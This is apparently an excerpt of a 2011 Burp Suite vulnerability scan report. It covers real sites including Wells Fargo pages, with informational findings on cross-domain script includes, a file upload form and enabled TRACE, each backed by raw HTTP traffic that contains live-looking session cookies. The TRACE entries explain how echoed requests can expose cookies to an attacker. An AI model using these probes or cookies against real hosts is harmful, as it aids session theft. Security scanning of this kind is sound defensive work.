Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</form>


<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/wria/1.3.1-sp1/jslib/wria-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.SignonHelper.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.BookmarksChooser.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.PMFP.js"></script>
...[SNIP]...

15.4. http://www.defaultroute.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.5. http://www.defaultroute.com/category/founders/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /category/founders/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/founders/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/services/thenetwork/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.2.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.6. http://www.defaultroute.com/services/thenetwork/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /services/thenetwork/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/thenetwork/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.1.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Link: <http://www.defaultroute.com/?p=567>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 10570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

15.8. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

15.9. http://www.healthcentral.com/common/js/healthcentral_common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /common/js/healthcentral_common.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/js/healthcentral_common.js HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d
If-None-Match: "9c05a-642a-4a820f19f2040"-gzip
If-Modified-Since: Fri, 15 Jul 2011 19:49:13 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 15 Jul 2011 19:50:43 GMT
ETag: "5b806c-642a-4a820f6fc6ac0"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 25642
Content-Type: application/x-javascript
Cache-Control: max-age=60
Date: Tue, 19 Jul 2011 01:58:21 GMT
Connection: close

document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"><\/script><script type="text/javascript" src="http://www.healthcentral.com/common
...[SNIP]...

15.10. http://www.rockhall.co.uk/ContactStyles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ContactStyles HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.11. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/goontwcn-webfont.woff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/templates/rockhall/fonts/goontwcn-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.12. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/templates/rockhall/fonts/gotwtw__-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.13. http://www.rockhall.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.14. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Date: Tue, 19 Jul 2011 02:00:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Vary: Accept-Encoding
Content-Length: 9530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Obsolete IT equipme
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.15. https://www.wellsfargo.com/locator/atm/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /locator/atm/search?txtCity=&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:51:23 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<div id="contentCol">
       

<script type="text/javascript" src="https://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&mkt=en-us&s=1"></script>
...[SNIP]...

15.16. https://www.wellsfargoadvisors.com/online-access/signon.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /online-access/signon.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /online-access/signon.htm HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gridTracking=%5B%5BB%5D%5D; s_cc=true; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dconversion%25253Asignon-decision.htm%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fonline-access%25252Fsignon.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 14:45:13 GMT
ETag: "e77-34d1-bf4f040"
Accept-Ranges: bytes
Content-Length: 13521
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
</script>
<script language="JavaScript" src="https://onlineservices.wellsfargo.com/auth/static/scripts/login.js" type="text/javascript"></script>
<script language="JavaScript" src="https://onlineservices.wellsfargo.com/auth/static/scripts/user-prefs.js" type="text/javascript"></script>
...[SNIP]...

16. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc1.maps.live.com
Path:   /js/bin/20110629.2253/en-us/Collections.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /js/bin/20110629.2253/en-us/Collections.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sc1.maps.live.com
Cookie: MUID=28B2E8D1A1F1676C3E0BEAE2A5F1676C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=63072000
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "030deb6ef36cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-BM-Srv: BL2M001208
Content-Length: 493618
Age: 408494
Date: Tue, 19 Jul 2011 12:11:16 GMT
Last-Modified: Thu, 30 Jun 2011 06:34:08 GMT
Expires: Sat, 13 Jul 2013 18:43:02 GMT
Connection: keep-alive

...if(typeof _VERegisterNamespaces==="undefined")_VERegisterNamespaces=Type.registerNamespace;Type.registerNamespace("Collections");Collections.$create_Bounds=function(g,d,e,f,b,c){var a={};a.x1=e;a.x
...[SNIP]...
</div>");a.push('<input id = "collectionimportfileid1" type="file" name="datafile" size="50" style="width:27em;height:1.9em">');a.push("</input>
...[SNIP]...

17. TRACE method is enabled
There are 5 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. https://blog.torproject.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /

Request

TRACE / HTTP/1.0
Host: blog.torproject.org
Cookie: 44001fcdd2221ee

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:47 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blog.torproject.org
Cookie: 44001fcdd2221ee; SESS2a0bf158f8e5df748619130e22f9b04a=pr37gpar6q95s8fb8vbo37ekd0


17.2. http://networkpresence.com.au/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /

Request

TRACE / HTTP/1.0
Host: networkpresence.com.au
Cookie: d474945db1831f1b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: networkpresence.com.au
